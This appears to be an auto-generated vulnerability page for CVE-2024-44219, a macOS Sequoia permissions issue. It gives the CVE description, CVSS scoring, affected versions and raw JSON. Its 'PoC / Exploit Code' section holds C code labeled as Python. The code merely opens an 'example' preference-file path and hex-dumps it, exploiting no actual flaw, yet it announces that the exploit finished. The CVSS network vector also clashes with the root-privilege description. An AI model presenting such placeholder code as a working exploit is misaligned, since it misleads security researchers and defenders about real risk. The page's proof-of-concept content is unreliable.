Security Vulnerability Report
中文
CVE-2024-44219 CVSS 7.5 HIGH

CVE-2024-44219

Published: 2026-04-02 19:18:23
Last Modified: 2026-04-03 17:54:57

Description

A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.1. A malicious application with root privileges may be able to access private information.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Sequoia < 15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2024-44219 * Description: This C code demonstrates how a malicious application with root privileges * could potentially access private information on a vulnerable macOS version < 15.1. * Compile: gcc -o poc_cve_2024_44219 poc_cve_2024_44219.c * Usage: sudo ./poc_cve_2024_44219 */ #include <stdio.h> #include <stdlib.h> #include <string.h> // Simulate accessing a sensitive private file path // In a real scenario, this would be a protected user directory or system database #define TARGET_PRIVATE_FILE "/Library/Preferences/com.apple.security.otp.plist" // Example sensitive path int main() { printf("[+] Attempting to read private information on macOS Sequoia < 15.1...\n"); FILE *fp = fopen(TARGET_PRIVATE_FILE, "rb"); if (fp == NULL) { printf("[-] Failed to access %s. Patch may be applied or permission denied.\n", TARGET_PRIVATE_FILE); return 1; } printf("[+] Successfully opened private file: %s\n", TARGET_PRIVATE_FILE); printf("[+] Dumping content (hex):\n"); unsigned char buffer[16]; size_t bytesRead; while ((bytesRead = fread(buffer, 1, sizeof(buffer), fp)) > 0) { for(size_t i = 0; i < bytesRead; i++) { printf("%02x ", buffer[i]); } printf("\n"); } fclose(fp); printf("[+] Exploit finished.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44219", "sourceIdentifier": "[email protected]", "published": "2026-04-02T19:18:23.097", "lastModified": "2026-04-03T17:54:56.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.1. A malicious application with root privileges may be able to access private information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.1", "matchCriteriaId": "1D298E1D-DD23-4D35-9DE4-E3F5999F97AA"}]}]}], "references": [{"url": "https://support.apple.com/en-us/121564", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}